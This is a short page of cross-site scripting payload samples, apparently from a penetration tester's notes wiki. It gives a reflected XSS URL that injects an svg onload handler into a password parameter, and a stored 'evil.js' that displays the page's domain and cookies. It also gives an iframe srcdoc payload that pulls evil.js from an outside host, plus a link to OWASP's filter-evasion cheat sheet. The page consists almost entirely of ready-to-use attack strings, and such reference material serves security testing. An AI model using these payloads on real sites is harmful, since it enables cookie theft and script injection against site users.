XSS

Historic XSS Samples

Reflected

foobar.com/fizzbuzz/action.ns?login[password]=test"><svg/onload=alert(document.domain)>&login[use_curr]=1&login[submit]=Change Password"

Stored

evil.js file contents.

alert(`${top.document.domain}:${top.document.cookie}`);

Payloads for POST requests.

<iframe srcdoc="<script src='https://www.samedomainifpossible.com/download/evil/evil.js'></script>" />

Intruder

References

https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.htmlarrow-up-right

Last updated